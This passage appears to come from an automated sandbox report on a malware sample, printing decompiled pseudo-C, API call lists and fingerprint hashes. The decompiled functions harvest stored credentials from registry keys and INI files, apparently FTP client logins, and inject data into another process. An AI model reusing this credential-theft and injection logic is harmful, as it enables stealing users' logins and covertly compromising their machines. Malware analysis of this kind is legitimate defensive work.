        • SetEvent.KERNEL32(?), ref: 0040F969
        • LeaveCriticalSection.KERNEL32(0041EC60), ref: 0040F970
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$EnterEventLeave
        • String ID: 3
        • API String ID: 3094578987-1842515611
        • Opcode ID: 8641eccf56462653cb55a0ea56ccb3cb76e54571a0c61343356b8eeb7efde375
        • Instruction ID: 7eb9f8aec41773ad9457d99176e3be68b05ba7646cf83af48a0870e552f4cd3c
        • Opcode Fuzzy Hash: 8641eccf56462653cb55a0ea56ccb3cb76e54571a0c61343356b8eeb7efde375
        • Instruction Fuzzy Hash: E8E09235104200EFC7206B35AD48D6BB764EBD6335704C53EF415F22B0C7389855CA59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 99%
        			E00407EB3(void* __edx, intOrPtr _a4) {
        				signed int _v12;
        				int _v16;
        				void* _v20;
        				int _v24;
        				signed int _v28;
        				int _v32;
        				char _v36;
        				signed int _v40;
        				signed int _v44;
        				signed int _v48;
        				signed int _v52;
        				intOrPtr _v56;
        				signed int _v60;
        				signed int _v64;
        				intOrPtr _v74;
        				intOrPtr _v78;
        				char _v80;
        				struct _SYSTEMTIME _v96;
        				char _v112;
        				short _v184;
        				short _v288;
        				void* __ebx;
        				void* __esi;
        				signed int _t127;
        				signed int _t131;
        				signed int _t132;
        				signed int _t133;
        				signed int _t134;
        				signed int _t140;
        				signed int _t142;
        				signed int _t143;
        				signed int _t151;
        				signed int _t155;
        				signed int _t159;
        				signed char _t163;
        				signed int _t167;
        				signed int _t176;
        				signed int _t177;
        				signed int _t186;
        				long _t191;
        				long _t195;
        				signed int _t201;
        				void* _t202;
        				signed int _t203;
        				signed int _t208;
        				signed int _t211;
        				signed int _t212;
        				signed int _t219;
        				short* _t230;
        				signed int _t238;
        				intOrPtr _t239;
        				void* _t244;
        
        				_t239 = _a4;
        				_t126 =  *((intOrPtr*)(_t239 + 0x40));
        				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
        					_t127 = E00416A93( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
        					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
        					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
        					_t238 = _t127;
        					_v64 = _t238;
        					__eflags = _t238;
        					if(_t238 == 0) {
        						L55:
        						E00411106(_v64);
        						__eflags = 0 -  *(_t239 + 0x3c);
        						asm("sbb eax, eax");
        						return  ~0x00000000;
        					}
        					_t131 = _v12;
        					__eflags = _t131 - 0x10;
        					if(_t131 <= 0x10) {
        						goto L55;
        					}
        					__eflags =  *((char*)(_t239 + 0x18)) - 1;
        					_v16 = 1;
        					_t132 = _t131 + _t238;
        					__eflags = _t132;
        					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
        					_v12 = _t132;
        					while(1) {
        						_t133 =  *(_t238 + 2) & 0x0000ffff;
        						__eflags = _t133 - 0x10;
        						if(_t133 < 0x10) {
        							goto L55;
        						}
        						_t219 =  *(_t238 + 4) & 0x0000ffff;
        						__eflags = _t219 - _t133;
        						if(_t219 >= _t133) {
        							goto L55;
        						}
        						__eflags =  *(_t238 + 6) - _t133;
        						if( *(_t238 + 6) >= _t133) {
        							goto L55;
        						}
        						__eflags =  *(_t238 + 8) - _t133;
        						if( *(_t238 + 8) >= _t133) {
        							goto L55;
        						}
        						__eflags =  *(_t238 + 0xa) - _t133;
        						if( *(_t238 + 0xa) >= _t133) {
        							goto L55;
        						}
        						__eflags =  *(_t238 + 0xc) - _t133;
        						if( *(_t238 + 0xc) >= _t133) {
        							goto L55;
        						}
        						__eflags =  *(_t238 + 0xe) - _t133;
        						if( *(_t238 + 0xe) >= _t133) {
        							goto L55;
        						}
        						_t134 =  *_t238 & 0x0000ffff;
        						_t208 = _t134 >> 0x00000009 & 0x00000008;
        						_t220 = _t238 + _t219;
        						__eflags = (_t134 & _v28) - _v28;
        						if((_t134 & _v28) != _v28) {
        							L48:
        							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
        							_t102 = _t238 + 0x10; // 0x10
        							__eflags = _t102 - _v12;
        							if(_t102 > _v12) {
        								goto L55;
        							}
        							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
        							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
        								goto L55;
        							}
        							_v16 = _v16 + 1;
        							continue;
        						}
        						_t234 = _t208;
        						_t140 = E00407B90(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
        						__eflags = _t140;
        						if(_t140 == 0) {
        							goto L48;
        						}
        						_t141 =  *(_t239 + 0x44);
        						__eflags =  *(_t239 + 0x44);
        						if(__eflags == 0) {
        							L16:
        							_t142 =  *(_t238 + 8) & 0x0000ffff;
        							__eflags = _t142;
        							if(_t142 == 0) {
        								L18:
        								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
        								__eflags = _t143;
        								if(_t143 == 0) {
        									L20:
        									__eflags =  *_t238 & 0x00000010;
        									if(( *_t238 & 0x00000010) == 0) {
        										L31:
        										E004111B9( &_v60,  &_v60, 0, 0x1c);
        										_v60 =  *_t238 & 0x0000ffff;
        										_t209 = _t208 | 0xffffffff;
        										_v56 = E00411564(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
        										_t151 =  *(_t238 + 6) & 0x0000ffff;
        										__eflags = _t151;
        										if(_t151 != 0) {
        											__eflags = _t151 + _t238;
        											_v52 = E00411564(_t209, _t151 + _t238);
        										} else {
        											_v52 = _v52 & 0x00000000;
        										}
        										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
        										__eflags = _t155;
        										if(_t155 != 0) {
        											__eflags = _t155 + _t238;
        											_v48 = E00411564(_t209, _t155 + _t238);
        										} else {
        											_v48 = _v48 & 0x00000000;
        										}
        										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
        										__eflags = _t159;
        										if(_t159 != 0) {
        											__eflags = _t159 + _t238;
        											_v44 = E00411564(_t209, _t159 + _t238);
        										} else {
        											_v44 = _v44 & 0x00000000;
        										}
        										_t163 =  *_t238 & 0x0000ffff;
        										__eflags = _t163 & 0x00000003;
        										if((_t163 & 0x00000003) != 0) {
        											E00408EE0( *(_t239 + 0x3c),  *(_t239 + 0x38));
        											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
        											_t167 = E00411159(__eflags,  &_v60, 0x1c);
        											 *(_t239 + 0x38) = _t167;
        											__eflags = _t167;
        											if(_t167 == 0) {
        												E00408EB7( &_v60);
        												_t239 = _a4;
        											} else {
        												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
        											}
        											goto L55;
        										} else {
        											__eflags = _t163 & 0x0000000c;
        											if(__eflags == 0) {
        												E00408EB7( &_v60);
        												L47:
        												_t239 = _a4;
        												goto L48;
        											}
        											_t211 = E00416A93( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
        											_v40 = _t211;
        											__eflags = _t211;
        											if(_t211 == 0) {
        												L54:
        												E00411106(_t211);
        												E00408EB7( &_v60);
        												_t239 = _a4;
        												E00408EE0( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
        												_t122 = _t239 + 0x3c;
        												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
        												__eflags =  *_t122;
        												goto L55;
        											}
        											_t176 = E00417165(_t211, _v36);
        											__eflags = _t176;
        											if(_t176 == 0) {
        												goto L54;
        											}
        											_t177 = E00411091(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
        											__eflags = _t177;
        											if(_t177 == 0) {
        												goto L54;
        											}
        											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
        											E00411142( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
        											goto L47;
        										}
        									}
        									__eflags =  *(_t238 + 0xc);
        									if( *(_t238 + 0xc) <= 0) {
        										goto L31;
        									}
        									E00406DAC( &_v184, _t220, 1,  &_v288);
        									_t186 = E004123AB( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E00411C43(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
        									__eflags = _t186;
        									if(_t186 == 0) {
        										goto L48;
        									}
        									_t230 =  &_v184;
        									_t212 = 0;
        									__eflags = 0;
        									do {
        										E0041146E( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
        										_t212 = _t212 + 1;
        										_t230 = _t230 + 4;
        										__eflags = _t212 - 0x10;
        									} while (_t212 < 0x10);
        									_v32 = _v32 | 0xffffffff;
        									_t208 = 0x10;
        									 *_t230 = 0;
        									_v24 = _t208;
        									_v20 = 0x80000001;
        									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
        									__eflags = _t191;
        									if(_t191 != 0) {
        										goto L31;
        									}
        									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
        									__eflags = _t195;
        									if(_t195 == 0) {
        										_v32 = _v24;
        									}
        									RegCloseKey(_v20);
        									__eflags = _v32 - _t208;
        									if(_v32 == _t208) {
        										GetLocalTime( &_v96);
        										__eflags = _v74 - _v96.wDay;
        										if(_v74 != _v96.wDay) {
        											goto L31;
        										}
        										__eflags = _v78 - _v96.wMonth;
        										if(_v78 == _v96.wMonth) {
        											goto L48;
        										}
        									}
        									goto L31;
        								}
        								_t220 = _t238 + _t143;
        								_t201 = E00407BC5(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
        								__eflags = _t201;
        								if(_t201 == 0) {
        									goto L48;
        								}
        								goto L20;
        							}
        							_t220 = _t238 + _t142;
        							_t202 = E00407BC5(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
        							__eflags = _t202 - 1;
        							if(_t202 == 1) {
        								goto L48;
        							}
        							goto L18;
        						}
        						_t203 = E00407E4B(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
        						__eflags = _t203;
        						if(_t203 != 0) {
        							goto L48;
        						}
        						goto L16;
        					}
        					goto L55;
        				}
        				return 0;
        			}

        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 079dff13de06a03271d108664618d9d81601a2398b82905e38c1be58f5e26f82
        • Instruction ID: 4920ff217b0b497269e5aed20bfaca108a0c9621a330f42038911c4a3688db1b
        • Opcode Fuzzy Hash: 079dff13de06a03271d108664618d9d81601a2398b82905e38c1be58f5e26f82
        • Instruction Fuzzy Hash: FFB1A271900609AADB10EF95CA41BFEB7B5BF44304F00442FE992B66D1DB78E985CB58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E0040B9D8(char* __ecx, void* __edx, void* __eflags) {
        				void* _v8;
        				signed int _v12;
        				intOrPtr _v16;
        				int _v20;
        				int _v24;
        				intOrPtr _v28;
        				char _v32;
        				char* _v36;
        				intOrPtr _v40;
        				intOrPtr _v44;
        				intOrPtr _v48;
        				char _v68;
        				char _v88;
        				char _v108;
        				char _v132;
        				char _v172;
        				short _v260;
        				short _v780;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t65;
        				intOrPtr _t92;
        				int _t104;
        				void* _t110;
        				intOrPtr _t112;
        				void* _t115;
        				int _t120;
        				void* _t125;
        				void* _t132;
        				void* _t135;
        				void* _t136;
        
        				_t119 = __edx;
        				_t118 = __ecx;
        				_t120 = 0;
        				E004111B9( &_v32,  &_v32, 0, 8);
        				_t65 = E004110D6(0xc1c);
        				_v16 = _t65;
        				if(_t65 == 0) {
        					L22:
        					if(_v28 <= _t120) {
        						return E00411106(_v32);
        					}
        					return E004095BC(_t119, _v32, 0xcb);
        				} else {
        					_v36 = _t65 + 0x3fc;
        					_v48 = 0x80000001;
        					_v44 = 0x80000002;
        					E0040CA33(0x8a,  &_v260);
        					E0040CA33(0x8b,  &_v88);
        					E0040CA33(0x8c,  &_v132);
        					E0040CA33(0x8d,  &_v68);
        					E0040CA33(0x8e,  &_v108);
        					_v12 = 0;
        					do {
        						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
        							goto L20;
        						}
        						_v24 = _t120;
        						_v20 = 0x104;
        						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
        							L19:
        							RegCloseKey(_v8);
        							goto L20;
        						} else {
        							goto L4;
        						}
        						L17:
        						_v20 = 0x104;
        						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
        							L4:
        							_t122 = _v16;
        							_v24 = _v24 + 1;
        							_t92 = E004150D3(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
        							_v40 = _t92;
        							if(_t92 != 0xffffffff && _t92 != 0) {
        								_t132 = E004150D3(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
        								if(_t132 != 0xffffffff && _t132 != 0) {
        									_t124 = _v36;
        									_t104 = E004150D3(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
        									_v20 = _t104;
        									if(_t104 != 0xffffffff && _t104 != 0 && E0040B91E(_t119, _t124, _t132 + _v40) > 0) {
        										_t125 = E00415189(_v8, _t118,  &_v780,  &_v132);
        										if(_t125 < 1 || _t125 > 0xffff) {
        											_t125 = 0x15;
        										}
        										_t134 =  &_v172;
        										_t110 = 0x55;
        										E0040CA33(_t110,  &_v172);
        										_t112 = _v16;
        										_t118 = _v36;
        										_push(_t125);
        										_push(_t112);
        										_push(_t118);
        										_push(_t112 + 0x1fe);
        										_t119 = 0x311;
        										_t126 = _t118 + 0x1fe;
        										_t115 = E00411DF9(_t134, 0x311, _t118 + 0x1fe, _t134);
        										_t136 = _t136 + 0x14;
        										if(_t115 > 0) {
        											_t118 =  &_v32;
        											if(E004114FA(_t115,  &_v32, _t126) != 0) {
        												_v28 = _v28 + 1;
        											}
        										}
        									}
        								}
        							}
        							goto L17;
        						} else {
        							_t120 = 0;
        							goto L19;
        						}
        						L20:
        						_v12 = _v12 + 1;
        					} while (_v12 < 2);
        					E00411106(_v16);
        					goto L22;
        				}
        			}

        APIs
        • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000), ref: 0040BA7E
        • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 0040BAA9
        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0040BBDF
          • Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8
        • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000), ref: 0040BBCC
          • Part of subcall function 004150D3: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407A8E,?,?,00000104), ref: 00415169
          • Part of subcall function 00415189: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040F567,?,?), ref: 004151A1
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Open$Enum$CloseEnvironmentExpandStrings
        • String ID:
        • API String ID: 2343474859-0
        • Opcode ID: 671eb57819131fb81984c6b766bb8f179961b1d84778f9cf20c573c03219e79a
        • Instruction ID: 420c5219a80fdb0106543425625d3474a2ced6e903569ac9aba45d4f5ba30b35
        • Opcode Fuzzy Hash: 671eb57819131fb81984c6b766bb8f179961b1d84778f9cf20c573c03219e79a
        • Instruction Fuzzy Hash: 76511E72D00119ABDB11DBA5CD45AEFB7BCEB48704F100176F915F3291DB38AE858BA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 91%
        			E0040BF6C(char* __ecx, void* __eflags) {
        				void* _v8;
        				int _v12;
        				intOrPtr _v16;
        				int* _v20;
        				intOrPtr _v24;
        				char _v28;
        				char* _v32;
        				char _v40;
        				char _v52;
        				char _v64;
        				char _v76;
        				char _v116;
        				short _v180;
        				short _v700;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t55;
        				int _t81;
        				int _t89;
        				int _t93;
        				void* _t99;
        				intOrPtr _t101;
        				void* _t104;
        				int* _t109;
        				char* _t113;
        				void* _t114;
        				void* _t122;
        
        				_t107 = __ecx;
        				_t109 = 0;
        				E004111B9( &_v28,  &_v28, 0, 8);
        				_t55 = E004110D6(0xc1c);
        				_v16 = _t55;
        				if(_t55 == 0) {
        					return _t55;
        				}
        				_v32 = _t55 + 0x3fc;
        				E0040CA33(0x97,  &_v180);
        				E0040CA33(0x98,  &_v64);
        				E0040CA33(0x99,  &_v76);
        				E0040CA33(0x9a,  &_v52);
        				E0040CA33(0x9b,  &_v40);
        				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
        					L20:
        					E00411106(_v16);
        					if(_v24 <= _t109) {
        						return E00411106(_v28);
        					}
        					return E004095BC(0x311, _v28, 0xcb);
        				}
        				_v20 = 0;
        				_v12 = 0x104;
        				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
        					L19:
        					RegCloseKey(_v8);
        					goto L20;
        				} else {
        					do {
        						_t111 = _v16;
        						_v20 = _v20 + 1;
        						_t81 = E004150D3(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
        						_v12 = _t81;
        						if(_t81 != 0xffffffff && _t81 != 0) {
        							_t89 = E004150D3(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
        							_v12 = _t89;
        							if(_t89 != 0xffffffff && _t89 != 0) {
        								_t113 = _v32;
        								_t93 = E004150D3(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
        								_v12 = _t93;
        								if(_t93 != 0xffffffff && _t93 != 0) {
        									_t107 = _t113;
        									if(E00411C55(_t113) > 0) {
        										_t114 = E00415189(_v8, _t107,  &_v700,  &_v76);
        										if(_t114 < 1 || _t114 > 0xffff) {
        											_t114 = 0x15;
        										}
        										_t121 =  &_v116;
        										_t99 = 0x55;
        										E0040CA33(_t99,  &_v116);
        										_t101 = _v16;
        										_t107 = _v32;
        										_push(_t114);
        										_push(_t101);
        										_push(_t107);
        										_push(_t101 + 0x1fe);
        										_t115 = _t107 + 0x1fe;
        										_t104 = E00411DF9(_t121, 0x311, _t107 + 0x1fe, _t121);
        										_t122 = _t122 + 0x14;
        										if(_t104 > 0) {
        											_t107 =  &_v28;
        											if(E004114FA(_t104,  &_v28, _t115) != 0) {
        												_v24 = _v24 + 1;
        											}
        										}
        									}
        								}
        							}
        						}
        						_v12 = 0x104;
        					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
        					_t109 = 0;
        					goto L19;
        				}
        			}

        APIs
        • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000), ref: 0040BFFA
        • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 0040C025
        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0040C15C
          • Part of subcall function 004150D3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00407A8E,?,?,00000104,.exe,00000000), ref: 004150E8
        • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000), ref: 0040C149
          • Part of subcall function 004150D3: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00407A8E,?,?,00000104), ref: 00415169
          • Part of subcall function 00415189: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0040F567,?,?), ref: 004151A1
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Open$Enum$CloseEnvironmentExpandStrings
        • String ID:
        • API String ID: 2343474859-0
        • Opcode ID: 15f9a1db8937c1196fc4b3d57c6b0e9a55096b2e3fd18cfd7e186a418d796e5f
        • Instruction ID: 5d42023a5feaf14aa7f1573eee98893e4fd7bb53c534574181b2dbb78230a309
        • Opcode Fuzzy Hash: 15f9a1db8937c1196fc4b3d57c6b0e9a55096b2e3fd18cfd7e186a418d796e5f
        • Instruction Fuzzy Hash: 37513376D00109EBDB10EBA5CD85AEFB7BDEF48304F100276B505F72A1D7389A868B64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E00418993(void* __eflags, intOrPtr _a4) {
        				signed int _v5;
        				short _v20;
        				char _v40;
        				char _v60;
        				short _v84;
        				char _v112;
        				char _v144;
        				short _v664;
        				char _v1184;
        				short _v1704;
        				char _v2224;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* _t31;
        				long _t33;
        				void* _t36;
        				void* _t42;
        				void* _t44;
        				void* _t46;
        				long _t50;
        				short* _t58;
        				char* _t65;
        				short _t66;
        				void* _t67;
        				WCHAR* _t70;
        				long _t77;
        
        				_t31 = 0x2a;
        				E0040CA33(_t31,  &_v144);
        				_t33 =  &_v1184;
        				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
        				if(_t33 == 0) {
        					_t33 = E00416745( &_v144,  &_v1184,  &_v1184);
        					if(_t33 != 0) {
        						_t36 = 0x2c;
        						E0040CA33(_t36,  &_v112);
        						_t33 = E00416745( &_v112,  &_v1704,  &_v1184);
        						if(_t33 != 0) {
        							_t33 = GetFileAttributesW( &_v1704);
        							if(_t33 != 0xffffffff) {
        								_t42 = 0x2d;
        								E0040CA33(_t42,  &_v60);
        								_t44 = 0x2e;
        								E0040CA33(_t44,  &_v84);
        								_t46 = 0x2f;
        								E0040CA33(_t46,  &_v20);
        								_v5 = 0;
        								while(1) {
        									_push(_v5 & 0x000000ff);
        									_push( &_v60);
        									_t67 = 0xa;
        									_t70 =  &_v40;
        									_t50 = E00411DF9( &_v60, _t67, _t70);
        									if(_t50 < 1) {
        										break;
        									}
        									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
        									_t77 = _t50;
        									if(_t77 == 0xffffffff) {
        										break;
        									}
        									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
        									if(_t50 == 0) {
        										L17:
        										_v5 = _v5 + 1;
        										if(_v5 < 0xfa) {
        											continue;
        										}
        										break;
        									}
        									_t58 =  &_v664;
        									if(_v664 == 0) {
        										L12:
        										if(_t77 != 1) {
        											_t65 =  &_v664;
        											L16:
        											_t50 = E00418B1A(0, _t65, _a4, _t90);
        											if(_t50 == 0) {
        												break;
        											}
        											goto L17;
        										}
        										_t50 = E00416745( &_v664,  &_v2224,  &_v1184);
        										_t90 = _t50;
        										if(_t50 == 0) {
        											goto L17;
        										}
        										_t65 =  &_v2224;
        										goto L16;
        									} else {
        										goto L9;
        									}
        									do {
        										L9:
        										if( *_t58 == 0x2f) {
        											_t66 = 0x5c;
        											 *_t58 = _t66;
        										}
        										_t58 = _t58 + 2;
        									} while ( *_t58 != 0);
        									goto L12;
        								}
        								return _t50;
        							}
        						}
        					}
        				}
        				return _t33;
        			}

        APIs
        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 004189BA
          • Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764
        • GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 00418A0E
        • GetPrivateProfileIntW.KERNEL32 ref: 00418A71
        • GetPrivateProfileStringW.KERNEL32 ref: 00418A9D
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: PathPrivateProfile$AttributesCombineFileFolderString
        • String ID:
        • API String ID: 1702184609-0
        • Opcode ID: 5812421822c77b917748efa40cc435aee642f8ca52f10767d5ed30df36ad7361
        • Instruction ID: fcf63ee04f8320bf3a7b3044fabee55ea7c6d46efa789f27aa1a1081b66f9293
        • Opcode Fuzzy Hash: 5812421822c77b917748efa40cc435aee642f8ca52f10767d5ed30df36ad7361
        • Instruction Fuzzy Hash: A0419572A04218AADF20E7A4DC85EDE777DAF05354F0001A7F614F71D1EB78AE898B58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E00406A38(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
        				char _v5;
        				void _v12;
        				intOrPtr _t25;
        				void _t26;
        				signed int _t29;
        				void _t43;
        				void* _t51;
        				void* _t52;
        
        				_t52 = __esi;
        				_t51 = __edi;
        				_t25 =  *0x41e5a4; // 0x400000
        				_t26 = E00415819(_t25, __edi);
        				_v12 = _t26;
        				if(_t26 != 0) {
        					_v5 = 0;
        					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
        						_v5 = 1;
        					}
        					_t29 =  *0x41e590; // 0x1
        					_a8 = _a8 | _t29 & 0x00000014;
        					_push(_t52);
        					if(WriteProcessMemory(_t51, 0x41e590 -  *0x41e5a4 + _v12,  &_a8, 4, 0) == 0) {
        						_v5 = _v5 + 1;
        					}
        					if(WriteProcessMemory(_t51, 0x41e5a4 -  *0x41e5a4 + _v12,  &_v12, 4, 0) == 0) {
        						_v5 = _v5 + 1;
        					}
        					if(E0040619A(0x41ea9c, _t51, _v12,  *0x41ea9c) == 0) {
        						_v5 = _v5 + 1;
        					}
        					if(E0040619A(0x41eaa0, _t51, _v12,  *0x41eaa0) == 0) {
        						_v5 = _v5 + 1;
        					}
        					if(_v5 == 0) {
        						_t43 = _v12;
        					} else {
        						VirtualFreeEx(_t51, _v12, 0, 0x8000);
        						goto L1;
        					}
        				} else {
        					L1:
        					_t43 = 0;
        				}
        				return _t43;
        			}


        APIs
          • Part of subcall function 00415819: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 00415835
        • DuplicateHandle.KERNEL32(000000FF,74B5F560,00000000,74B5F560,00000000,00000000,00000002,00000000,00000000,?,?,?,0040CC1F,?,00000000,?), ref: 00406A6A
        • WriteProcessMemory.KERNEL32(00000000,74B5F560,?,00000004,00000000,?,?,?,?,0040CC1F,?,00000000,?,?,0040CDAD,?), ref: 00406AA1
        • WriteProcessMemory.KERNEL32(00000000,74B5F560,74B5F560,00000004,00000000,?,?,?,0040CC1F,?,00000000,?,?,0040CDAD,?,?), ref: 00406AC1
        • VirtualFreeEx.KERNEL32(00000000,74B5F560,00000000,00008000,00000000,74B5F560,00000000,74B5F560,?,?,0040CC1F,?,00000000,?,?,0040CDAD), ref: 00406B10
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
        • String ID:
        • API String ID: 2215616122-0
        • Opcode ID: 2d200f96fa126b96dbe5c9355003f0b97c7b7ee4852bfdf49b0a883264799d1e
        • Instruction ID: 3b5328fe60e4150a9166694667562aacbe6a4c14233b6b8fd088e3fdc1c7bec4
        • Opcode Fuzzy Hash: 2d200f96fa126b96dbe5c9355003f0b97c7b7ee4852bfdf49b0a883264799d1e
        • Instruction Fuzzy Hash: 0D21D276604108BEDF01DBD5CC81EEE7F79EF59348F0080A9FA06F6151E33599559B28
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CoCreateInstance.OLE32(00401528,00000000,00004401,00401518,?,?,?,?,?,?,?,?,?,00409F0E,?,?), ref: 004173E0
        • VariantInit.OLEAUT32(?), ref: 0041742C
        • SysAllocString.OLEAUT32(?), ref: 0041743C
        • VariantClear.OLEAUT32(?), ref: 00417475
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Variant$AllocClearCreateInitInstanceString
        • String ID:
        • API String ID: 3126708813-0
        • Opcode ID: f0a001ec3ed2332c28c346bda5c71fa4eafb9394e8d579e9a6aef066daeaa89d
        • Instruction ID: 4487217032a1bb2d3e111d82d23ba0d69d22c1785919c43567b51aea64ed2e0d
        • Opcode Fuzzy Hash: f0a001ec3ed2332c28c346bda5c71fa4eafb9394e8d579e9a6aef066daeaa89d
